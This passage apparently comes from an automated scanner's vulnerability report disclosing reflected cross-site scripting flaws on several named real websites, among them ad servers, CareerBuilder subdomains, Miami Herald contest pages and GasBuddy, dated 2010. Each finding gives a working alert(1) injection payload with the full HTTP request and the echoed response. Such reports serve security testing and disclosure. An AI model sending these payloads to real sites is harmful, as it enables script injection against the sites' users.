2.87. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /adiframe|3.0|5310.1|1403971|0|154|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfde3"><script>alert(1)</script>86feb4edcdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH?dfde3"><script>alert(1)</script>86feb4edcdc=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92156"><script>alert(1)</script>4d96c896b2f was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]92156"><script>alert(1)</script>4d96c896b2f HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 64472><script>alert(1)</script>d67b57e15b9 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=64472><script>alert(1)</script>d67b57e15b9 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d03"><script>alert(1)</script>8cd0b4d7f09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH51d03"><script>alert(1)</script>8cd0b4d7f09 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233
2.91. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /adiframe|3.0|5310.1|1403973|0|154|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc81f"><script>alert(1)</script>6147fcf2f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH?dc81f"><script>alert(1)</script>6147fcf2f5c=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5a07><script>alert(1)</script>ee1b21623f9 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=f5a07><script>alert(1)</script>ee1b21623f9 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2771"><script>alert(1)</script>fe9daaa66f4 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]a2771"><script>alert(1)</script>fe9daaa66f4 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7438e"%20a%3db%2089af122eadb was submitted in the lr parameter. This input was echoed as 7438e" a=b 89af122eadb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /bf.ic/Florida_Miami/?lr=cbcb_mh7438e"%20a%3db%2089af122eadb&SiteID=cbcb_mh032 HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193077
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=3adeb3a3a665452cb3db8746cef2a482-343070718-RL-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F382261A0B497E7E52C90A9B44136C94C95BE2C9A785411BADAB46C05F6A5E15C781B87732DBDCFD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:18 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:18 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL21
Date: Sun, 14 Nov 2010 22:25:18 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6025c'-alert(1)-'3bfd288b45f was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bf.ic/Florida_Miami/?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&SiteID=cbcb_mh032 HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193722
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=903408c97ec947c08e82b77995846faa-343070747-R8-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6509E4FC31D7F51112E8E6BD66A74398A35D57E2B3EBA0654540D3F956B9C1E4072777AFAB66DA72AF8; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:46 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 14 Nov 2010 22:25:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the pageid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13c44"%3b859ccf53fe9 was submitted in the pageid parameter. This input was echoed as 13c44";859ccf53fe9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wireless/signup.cfm?sid=1007&pageid=textalert1_main13c44"%3b859ccf53fe9 HTTP/1.1
Host: cf.localwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:24:13 GMT
Server: Apache
P3P: CP="CAO PSA OUR"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4535
...[SNIP]... er out internal URLs for exit link tracking. s.s_timeZone = "-5" //Timezone for time parting plug-in. Use -5 for EST, -6 for CST, -7 for MST, and -8 for PST
/* props*/ s.pageName="textalert1_main13c44";859ccf53fe9" //gn: Page Name s.hier1="miami+herald,wap,signup,index" //h1: Hierarchy s.prop1="" //c1: internal search terms s.prop2="" //c2: internal search type s.prop3="" //c3: # of search results s.prop4= ...[SNIP]...
2.97. http://contest.herald.com/cirquekoozamiami/standard/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://contest.herald.com
Path: /cirquekoozamiami/standard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460ad"><script>alert(1)</script>c14ec16b048 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cirquekoozamiami/standard/?460ad"><script>alert(1)</script>c14ec16b048=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:24:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7334
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=NLNLEONDOGIEOKCHIODLANOL; path=/
Cache-control: private
The value of the 9cec8"><script>alert(1)</script>2f7e3e1de94 request parameter is copied into the HTML document as plain text between tags. The payload c6ae2<script>alert(1)</script>890e9b13aa5 was submitted in the 9cec8"><script>alert(1)</script>2f7e3e1de94 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM request parameter is copied into the HTML document as plain text between tags. The payload 290ad<script>alert(1)</script>9c0c1192ca0 was submitted in the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.100. http://contest.herald.com/nascar/standard/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://contest.herald.com
Path: /nascar/standard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cec8"><script>alert(1)</script>2f7e3e1de94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nascar/standard/?9cec8"><script>alert(1)</script>2f7e3e1de94=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7834
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=JLNLEONDPKNMJMBLEDNCDCCF; path=/
Cache-control: private
The value of the 9cec8 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd903"><script>alert(1)</script>b536c827e11 was submitted in the 9cec8 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nascar/standard/index.asp?9cec8bd903"><script>alert(1)</script>b536c827e11 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7837
Content-Type: text/html
Cache-control: private
2.102. http://contest.herald.com/nascar/standard/index.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://contest.herald.com
Path: /nascar/standard/index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a89b"><script>alert(1)</script>3188a7af4b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nascar/standard/index.asp?8a89b"><script>alert(1)</script>3188a7af4b6=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7834
Content-Type: text/html
Cache-control: private
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb3e"%20a%3db%20422e5f94b75 was submitted in the lr parameter. This input was echoed as 1eb3e" a=b 422e5f94b75 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cs.ic/Florida_Miami/?lr=cbcb_mh1eb3e"%20a%3db%20422e5f94b75&SiteID=cbcb_mh035 HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190637
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=42ee23d9340f4db492a4a340c1372514-343070753-R6-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508E8A7C46AB17B4CC2649D27018AC4F86CFA6335C2EB6692671084E2DB62F4AE108378824736F440F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:52 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL6
Date: Sun, 14 Nov 2010 22:25:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d08'-alert(1)-'04a0701f11a was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cs.ic/Florida_Miami/?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&SiteID=cbcb_mh035 HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191278
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=eb938c0781184bcfb4d4faf5fcfe8db1-343070776-VL-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508074FA90E44D5B4F83A5472AC69B952B487300C8C40C2DDB00966E3520AE4545781BCE2F2128AA0A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:15 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:16 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL33
Date: Sun, 14 Nov 2010 22:26:15 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d2a'-alert(1)-'486dca9d5d was submitted in the i parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2a'-alert(1)-'486dca9d5d HTTP/1.1
Host: df.gasbuddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:25:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 603
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1810'-alert(1)-'b9c2d2adc10 was submitted in the k parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1b1810'-alert(1)-'b9c2d2adc10&i=2834 HTTP/1.1
Host: df.gasbuddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:25:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 604
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd5e"><script>alert(1)</script>4fe0b2c4f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c HTTP/1.1
Host: eltiempo.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:26:23 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 3.181
Set-Cookie: ASC=1289773583:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 24864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c?map=IRSatellite&anim=0"> ...[SNIP]...
2.108. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://eltiempo.elnuevoherald.com
Path: /US/FL/Miami.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b46d"><script>alert(1)</script>4d14efa3e5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1 HTTP/1.1
Host: eltiempo.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:25:56 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 3.285
Set-Cookie: ASC=1289773556:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 24870
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1&map=IRSatellite&anim=0"> ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbee"%20a%3db%20312f0d1a369 was submitted in the lr parameter. This input was echoed as adbee" a=b 312f0d1a369 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /en.ic/Florida_Miami/?lr=cbcb_mhadbee"%20a%3db%20312f0d1a369&SiteID=cbcb_mh037 HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194088
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=9a591372b45048d197c7450f2738d22c-343070827-RP-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650D89AFF5D24976CE7314F6F2F9565A4DD9C01C8ABDFDB17E60471E4011A7A49609332F6EA0B9FFBAC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:07 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:07 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL25
Date: Sun, 14 Nov 2010 22:27:07 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b493'-alert(1)-'1a957c281b6 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en.ic/Florida_Miami/?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&SiteID=cbcb_mh037 HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194890
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=9dc8162df01c4990b3256468ae53f08e-343070847-RS-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65044DFD330AB56844A290AE2950B748B2AAA785234862F5A2BE9A14C55B142B8293BC3E047BD96D1BF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:27 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:27 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL28
Date: Sun, 14 Nov 2010 22:27:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
